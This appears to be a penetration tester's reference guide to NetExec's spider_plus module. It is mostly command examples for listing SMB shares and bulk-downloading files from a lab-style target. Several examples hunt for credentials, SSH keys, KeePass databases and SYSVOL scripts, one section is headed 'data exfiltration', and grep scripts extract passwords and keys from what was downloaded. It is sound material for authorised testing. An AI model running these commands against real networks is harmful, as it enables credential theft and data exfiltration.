netexec-spiderplus.md (15644B)
1 --- 2 title: "NetExec - SpiderPlus" 3 description: "NetExec has two main spider modules:" 4 category: tools 5 tags: ["tools"] 6 tools: ["NetExec", "PowerShell"] 7 difficulty: intermediate 8 updated: "2026-08-10" 9 source: "vault:Tools/NetExec - SpiderPlus.md" 10 --- 11 # NetExec Spider Module Guide - Downloading Files from SMB Shares 12 13 ## Spider Modules Overview 14 15 NetExec has two main spider modules: 16 - **spider_plus** - Modern, feature-rich (recommended) 17 - **spider** - Legacy module (deprecated) 18 19 --- 20 21 ## Spider Plus Module Deep Dive 22 23 ### 1. Basic Spider Usage (List Files Only) 24 25 ```bash 26 # Spider all shares (read-only mode - no downloads) 27 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus 28 29 # Spider with null/guest session 30 nxc smb 10.10.11.51 -u '' -p '' -M spider_plus 31 nxc smb 10.10.11.51 -u 'guest' -p '' -M spider_plus 32 33 # Spider specific share 34 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o SHARE=ShareName 35 ``` 36 37 **Output Location:** Results saved to `/tmp/nxc_spider_plus/<IP>_<timestamp>.json` 38 39 --- 40 41 ## 2. Downloading Files 42 43 ### Download All Files 44 ```bash 45 # Enable download mode (downloads everything!) 46 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o READ_ONLY=false 47 48 # Downloads saved to: /tmp/nxc_spider_plus/<IP>/ 49 ``` 50 51 ⚠️ **Warning:** This downloads ALL accessible files. Use filters to limit! 52 53 --- 54 55 ## 3. Filtering Options 56 57 ### Filter by File Extension 58 59 ```bash 60 # Download only specific file types 61 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o READ_ONLY=false EXT=txt,doc,docx,pdf 62 63 # Common useful extensions 64 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o READ_ONLY=false EXT=txt,pdf,docx,xlsx,xml,config,conf,ini,ps1,bat,cmd 65 66 # Password files and sensitive data 67 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o READ_ONLY=false EXT=txt,xml,config,ini,kdbx,key,pem 68 69 # Scripts and code 70 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o READ_ONLY=false EXT=ps1,bat,cmd,vbs,js,py,sh 71 ``` 72 73 ### Filter by File Size 74 75 ```bash 76 # Download files within size range (in bytes) 77 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o READ_ONLY=false MAX_FILE_SIZE=52428800 78 79 # Small files only (under 10MB) 80 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o READ_ONLY=false MAX_FILE_SIZE=10485760 81 82 # Exclude empty files 83 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o READ_ONLY=false MIN_FILE_SIZE=1 84 ``` 85 86 **Size Reference:** 87 - 1 MB = 1,048,576 bytes 88 - 10 MB = 10,485,760 bytes 89 - 50 MB = 52,428,800 bytes 90 - 100 MB = 104,857,600 bytes 91 92 ### Filter by Pattern (Filename Matching) 93 94 ```bash 95 # Download files matching a pattern 96 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o READ_ONLY=false PATTERN=password 97 98 # Multiple patterns (comma-separated) 99 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o READ_ONLY=false PATTERN=password,admin,secret,credential,backup 100 101 # Case-insensitive pattern matching (default behavior) 102 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o READ_ONLY=false PATTERN=pass 103 ``` 104 105 ### Exclude Folders 106 107 ```bash 108 # Exclude specific directories 109 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o READ_ONLY=false EXCLUDE_DIR=Windows,Program Files 110 111 # Exclude common system folders 112 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o EXCLUDE_DIR="Windows,Program Files,Program Files (x86),$Recycle.Bin" 113 ``` 114 115 --- 116 117 ## 4. Advanced Filtering Combinations 118 119 ### Hunt for Passwords and Credentials 120 121 ```bash 122 # Download credential-related files 123 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus \ 124 -o READ_ONLY=false \ 125 PATTERN=password,pass,pwd,credential,cred,secret,admin,backup,config \ 126 EXT=txt,xml,config,ini,conf,kdbx,key,pem,ppk \ 127 MAX_FILE_SIZE=10485760 128 129 # Download KeePass databases 130 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus \ 131 -o READ_ONLY=false \ 132 EXT=kdbx,kdb 133 134 # Download SSH keys 135 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus \ 136 -o READ_ONLY=false \ 137 PATTERN=id_rsa,id_dsa,id_ecdsa,id_ed25519 \ 138 EXT=pem,key,ppk 139 ``` 140 141 ### Hunt for Scripts and Configuration 142 143 ```bash 144 # Download scripts and configs 145 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus \ 146 -o READ_ONLY=false \ 147 EXT=ps1,bat,cmd,vbs,sh,py,config,conf,ini,xml,json \ 148 MAX_FILE_SIZE=5242880 149 150 # PowerShell scripts only 151 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus \ 152 -o READ_ONLY=false \ 153 EXT=ps1,psm1,psd1 154 ``` 155 156 ### Hunt for Documentation 157 158 ```bash 159 # Download documents 160 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus \ 161 -o READ_ONLY=false \ 162 EXT=doc,docx,pdf,txt,rtf,odt,xls,xlsx \ 163 MAX_FILE_SIZE=52428800 164 165 # Small text files only (README, notes, etc.) 166 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus \ 167 -o READ_ONLY=false \ 168 EXT=txt,md \ 169 MAX_FILE_SIZE=1048576 170 ``` 171 172 ### Hunt for Backup Files 173 174 ```bash 175 # Download backup files 176 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus \ 177 -o READ_ONLY=false \ 178 PATTERN=backup,bak,old,copy \ 179 EXT=bak,zip,7z,rar,tar,gz,old 180 181 # Archive files 182 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus \ 183 -o READ_ONLY=false \ 184 EXT=zip,7z,rar,tar,gz,bz2 \ 185 MAX_FILE_SIZE=104857600 186 ``` 187 188 --- 189 190 ## 5. Complete Spider Workflow 191 192 ### Phase 1: Reconnaissance (No Download) 193 194 ```bash 195 # Step 1: Identify accessible shares 196 nxc smb 10.10.11.51 -u 'username' -p 'password' --shares 197 198 # Step 2: Spider to see what's available (read-only) 199 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus 200 201 # Step 3: Review the JSON output 202 cat /tmp/nxc_spider_plus/10.10.11.51_*.json | jq '.' 203 204 # Step 4: Analyze file types and names 205 cat /tmp/nxc_spider_plus/10.10.11.51_*.json | jq '.[] | .name' | sort -u 206 ``` 207 208 ### Phase 2: Targeted Download 209 210 ```bash 211 # Based on reconnaissance, download specific files 212 213 # Example: Found interesting configs 214 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus \ 215 -o READ_ONLY=false \ 216 SHARE=IT_Share \ 217 EXT=config,conf,xml,ini \ 218 MAX_FILE_SIZE=5242880 219 220 # Example: Found password files 221 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus \ 222 -o READ_ONLY=false \ 223 PATTERN=password,credential \ 224 MAX_FILE_SIZE=1048576 225 ``` 226 227 ### Phase 3: Post-Download Analysis 228 229 ```bash 230 # Navigate to download location 231 cd /tmp/nxc_spider_plus/10.10.11.51/ 232 233 # Find all downloaded files 234 find . -type f 235 236 # Search for passwords in files 237 grep -r -i "password" . 238 grep -r -i "pass" . | grep -v "Binary" 239 240 # Search for usernames 241 grep -r -i "username" . 242 grep -r -i "admin" . 243 244 # Search for IP addresses 245 grep -r -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" . 246 247 # Search for email addresses 248 grep -r -oE "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b" . 249 250 # List files by size 251 find . -type f -exec ls -lh {} \; | sort -k5 -h 252 253 # Find recently modified files 254 find . -type f -mtime -30 -ls 255 ``` 256 257 --- 258 259 ## 6. Spider Plus All Options Reference 260 261 ```bash 262 nxc smb <target> -u <user> -p <pass> -M spider_plus -o <OPTIONS> 263 ``` 264 265 | Option | Description | Example | 266 |:---|:---|:---| 267 | `READ_ONLY` | If false, downloads files (default: true) | `READ_ONLY=false` | 268 | `SHARE` | Target specific share | `SHARE=C$` | 269 | `EXCLUDE_DIR` | Exclude directories (comma-separated) | `EXCLUDE_DIR=Windows,Temp` | 270 | `MAX_FILE_SIZE` | Max file size in bytes (default: 51200) | `MAX_FILE_SIZE=52428800` | 271 | `MIN_FILE_SIZE` | Min file size in bytes | `MIN_FILE_SIZE=1` | 272 | `EXT` | File extensions (comma-separated) | `EXT=txt,pdf,docx` | 273 | `PATTERN` | Filename pattern match | `PATTERN=password,admin` | 274 | `EXCLUDE_EXTS` | Exclude extensions | `EXCLUDE_EXTS=exe,dll,sys` | 275 276 --- 277 278 ## 7. Practical Examples 279 280 ### Example 1: Initial Quick Recon 281 282 ```bash 283 # First pass - just enumerate 284 nxc smb 10.10.11.51 -u 'jsmith' -p 'Summer2024!' -M spider_plus 285 286 # Check results 287 cat /tmp/nxc_spider_plus/10.10.11.51_*.json | jq '.[].name' | grep -i password 288 ``` 289 290 ### Example 2: Download Interesting Files 291 292 ```bash 293 # Download files with "password" or "config" in name 294 nxc smb 10.10.11.51 -u 'jsmith' -p 'Summer2024!' -M spider_plus \ 295 -o READ_ONLY=false \ 296 PATTERN=password,config,credential,backup \ 297 EXT=txt,xml,ini,config,conf \ 298 MAX_FILE_SIZE=10485760 299 300 # Check what was downloaded 301 ls -lah /tmp/nxc_spider_plus/10.10.11.51/ 302 ``` 303 304 ### Example 3: Specific Share Hunting 305 306 ```bash 307 # Target the SYSVOL share (often contains scripts) 308 nxc smb 10.10.11.51 -u 'jsmith' -p 'Summer2024!' -M spider_plus \ 309 -o READ_ONLY=false \ 310 SHARE=SYSVOL \ 311 EXT=bat,cmd,ps1,vbs,xml 312 313 # Target NETLOGON share 314 nxc smb 10.10.11.51 -u 'jsmith' -p 'Summer2024!' -M spider_plus \ 315 -o READ_ONLY=false \ 316 SHARE=NETLOGON \ 317 EXT=bat,cmd,ps1,vbs 318 ``` 319 320 ### Example 4: Large Scale Data Exfiltration 321 322 ```bash 323 # Download all office documents (be careful with size!) 324 nxc smb 10.10.11.51 -u 'jsmith' -p 'Summer2024!' -M spider_plus \ 325 -o READ_ONLY=false \ 326 EXT=doc,docx,xls,xlsx,ppt,pptx,pdf \ 327 MAX_FILE_SIZE=52428800 \ 328 EXCLUDE_DIR="Windows,Program Files" 329 330 # Monitor download progress 331 watch -n 5 'du -sh /tmp/nxc_spider_plus/10.10.11.51/' 332 ``` 333 334 ### Example 5: Multiple Hosts 335 336 ```bash 337 # Spider multiple hosts (saves to separate folders) 338 nxc smb 10.10.11.0/24 -u 'jsmith' -p 'Summer2024!' -M spider_plus \ 339 -o READ_ONLY=false \ 340 PATTERN=password \ 341 EXT=txt,xml,config \ 342 MAX_FILE_SIZE=5242880 343 344 # Results organized by IP 345 ls -lah /tmp/nxc_spider_plus/ 346 ``` 347 348 --- 349 350 ## 8. Pro Tips & Best Practices 351 352 ### Performance Tips 353 354 ```bash 355 # Use MAX_FILE_SIZE to avoid huge files 356 nxc smb 10.10.11.51 -u 'user' -p 'pass' -M spider_plus -o READ_ONLY=false MAX_FILE_SIZE=10485760 357 358 # Use EXCLUDE_DIR to skip system folders 359 nxc smb 10.10.11.51 -u 'user' -p 'pass' -M spider_plus -o EXCLUDE_DIR="Windows,Program Files,$Recycle.Bin" 360 361 # Target specific shares to reduce scope 362 nxc smb 10.10.11.51 -u 'user' -p 'pass' -M spider_plus -o SHARE=Users 363 ``` 364 365 ### OPSEC Considerations 366 367 ```bash 368 # Start with read-only enumeration 369 nxc smb 10.10.11.51 -u 'user' -p 'pass' -M spider_plus 370 371 # Download only specific, small files to reduce network traffic 372 nxc smb 10.10.11.51 -u 'user' -p 'pass' -M spider_plus \ 373 -o READ_ONLY=false \ 374 PATTERN=password \ 375 EXT=txt \ 376 MAX_FILE_SIZE=1048576 377 378 # Be aware: Downloads create access logs on the target 379 ``` 380 381 ### Organizing Downloads 382 383 ```bash 384 # Create organized workspace 385 mkdir -p ~/pentest/target/smb_loot 386 cd ~/pentest/target/smb_loot 387 388 # Run spider 389 nxc smb 10.10.11.51 -u 'user' -p 'pass' -M spider_plus -o READ_ONLY=false 390 391 # Move from /tmp to your workspace 392 mv /tmp/nxc_spider_plus/10.10.11.51 ./ 393 394 # Organize by file type 395 cd 10.10.11.51 396 mkdir configs scripts documents 397 find . -name "*.config" -o -name "*.xml" -o -name "*.ini" | xargs -I {} mv {} configs/ 398 find . -name "*.ps1" -o -name "*.bat" -o -name "*.cmd" | xargs -I {} mv {} scripts/ 399 find . -name "*.doc*" -o -name "*.pdf" -o -name "*.txt" | xargs -I {} mv {} documents/ 400 ``` 401 402 --- 403 404 ## 9. Post-Spider Analysis Scripts 405 406 ### Quick Grep for Sensitive Data 407 408 ```bash 409 #!/bin/bash 410 # save as analyze_spider.sh 411 412 TARGET_DIR="/tmp/nxc_spider_plus/10.10.11.51" 413 414 echo "[+] Searching for passwords..." 415 grep -r -i "password\s*=" $TARGET_DIR 2>/dev/null | grep -v "Binary" 416 417 echo "[+] Searching for usernames..." 418 grep -r -i "username\s*=" $TARGET_DIR 2>/dev/null | grep -v "Binary" 419 420 echo "[+] Searching for API keys..." 421 grep -r -i "api_key\|apikey\|api-key" $TARGET_DIR 2>/dev/null | grep -v "Binary" 422 423 echo "[+] Searching for connection strings..." 424 grep -r -i "connection.*string\|server=\|database=" $TARGET_DIR 2>/dev/null | grep -v "Binary" 425 426 echo "[+] Searching for private keys..." 427 find $TARGET_DIR -type f -exec grep -l "BEGIN.*PRIVATE KEY" {} \; 428 429 echo "[+] Files containing 'password':" 430 find $TARGET_DIR -type f -exec grep -l -i "password" {} \; | head -20 431 ``` 432 433 ### Generate File Inventory 434 435 ```bash 436 #!/bin/bash 437 # save as inventory.sh 438 439 TARGET_DIR="/tmp/nxc_spider_plus/10.10.11.51" 440 441 echo "[+] File type distribution:" 442 find $TARGET_DIR -type f | sed 's/.*\.//' | sort | uniq -c | sort -rn 443 444 echo -e "\n[+] Largest files:" 445 find $TARGET_DIR -type f -exec ls -lh {} \; | sort -k5 -hr | head -10 446 447 echo -e "\n[+] Recently modified files:" 448 find $TARGET_DIR -type f -mtime -30 -exec ls -lh {} \; | head -10 449 450 echo -e "\n[+] Files with interesting names:" 451 find $TARGET_DIR -type f | grep -iE "(password|config|admin|secret|credential|backup|key)" 452 ``` 453 454 --- 455 456 ## 10. Common Issues & Solutions 457 458 ### Issue: Permission Denied 459 ```bash 460 # Some files may not be readable 461 # Solution: Spider will skip them and continue 462 463 # Check spider_plus JSON for access denied files 464 cat /tmp/nxc_spider_plus/10.10.11.51_*.json | jq '.[] | select(.error != null)' 465 ``` 466 467 ### Issue: Too Many Files 468 ```bash 469 # If spider returns thousands of files: 470 # Solution: Use more specific filters 471 472 # Count files before downloading 473 cat /tmp/nxc_spider_plus/10.10.11.51_*.json | jq '. | length' 474 475 # Filter more aggressively 476 nxc smb 10.10.11.51 -u 'user' -p 'pass' -M spider_plus \ 477 -o READ_ONLY=false \ 478 EXT=txt,xml \ 479 PATTERN=password \ 480 MAX_FILE_SIZE=1048576 481 ``` 482 483 ### Issue: Finding Downloaded Files 484 ```bash 485 # Default location: 486 /tmp/nxc_spider_plus/<TARGET_IP>/ 487 488 # Spider metadata (JSON): 489 /tmp/nxc_spider_plus/<TARGET_IP>_<timestamp>.json 490 491 # Find all spider directories 492 find /tmp/nxc_spider_plus/ -type d 493 ``` 494 495 --- 496 497 ## Quick Reference Card 498 499 | Task | Command | 500 |:---|:---| 501 | List files only | `nxc smb <ip> -u <user> -p <pass> -M spider_plus` | 502 | Download all files | `nxc smb <ip> -u <user> -p <pass> -M spider_plus -o READ_ONLY=false` | 503 | Download specific types | `nxc smb <ip> -u <user> -p <pass> -M spider_plus -o READ_ONLY=false EXT=txt,pdf` | 504 | Download by pattern | `nxc smb <ip> -u <user> -p <pass> -M spider_plus -o READ_ONLY=false PATTERN=password` | 505 | Limit file size | `nxc smb <ip> -u <user> -p <pass> -M spider_plus -o READ_ONLY=false MAX_FILE_SIZE=10485760` | 506 | Specific share | `nxc smb <ip> -u <user> -p <pass> -M spider_plus -o SHARE=Users` | 507 | Exclude folders | `nxc smb <ip> -u <user> -p <pass> -M spider_plus -o EXCLUDE_DIR=Windows,Temp` | 508 | View JSON output | `cat /tmp/nxc_spider_plus/<ip>_*.json \| jq '.'` | 509 | Find passwords in files | `grep -r -i "password" /tmp/nxc_spider_plus/<ip>/` | 510 511 --- 512 513 ## Real-World Hunting Scenarios 514 515 ### Scenario 1: Found Valid Low-Priv Credentials 516 517 ```bash 518 # Step 1: What can we access? 519 nxc smb 10.10.11.51 -u 'jsmith' -p 'pass' --shares 520 521 # Step 2: List everything (no download yet) 522 nxc smb 10.10.11.51 -u 'jsmith' -p 'pass' -M spider_plus 523 524 # Step 3: Hunt for creds in configs 525 nxc smb 10.10.11.51 -u 'jsmith' -p 'pass' -M spider_plus \ 526 -o READ_ONLY=false \ 527 PATTERN=password,credential,config \ 528 EXT=xml,config,ini,txt \ 529 MAX_FILE_SIZE=2097152 530 531 # Step 4: Analyze 532 cd /tmp/nxc_spider_plus/10.10.11.51 533 grep -r -i "password\|credential" . 534 ``` 535 536 ### Scenario 2: Lateral Movement via Shares 537 538 ```bash 539 # Download scripts to find hardcoded creds 540 nxc smb 10.10.11.0/24 -u 'jsmith' -p 'pass' -M spider_plus \ 541 -o READ_ONLY=false \ 542 EXT=ps1,bat,cmd,vbs \ 543 SHARE=SYSVOL 544 545 # Search scripts for credentials 546 find /tmp/nxc_spider_plus/ -name "*.ps1" -exec grep -H "password\|credential" {} \; 547 ``` 548 549 ### Scenario 3: Backup File Discovery 550 551 ```bash 552 # Find and download backups 553 nxc smb 10.10.11.51 -u 'backupuser' -p 'pass' -M spider_plus \ 554 -o READ_ONLY=false \ 555 PATTERN=backup,bak \ 556 EXT=zip,7z,bak,old,backup \ 557 MAX_FILE_SIZE=104857600 558 559 # Extract archives 560 cd /tmp/nxc_spider_plus/10.10.11.51 561 find . -name "*.zip" -exec unzip -d extracted {} \; 562 ``` 563 564 --- 565 566 Remember: **Always have proper authorization before downloading files from systems you don't own!**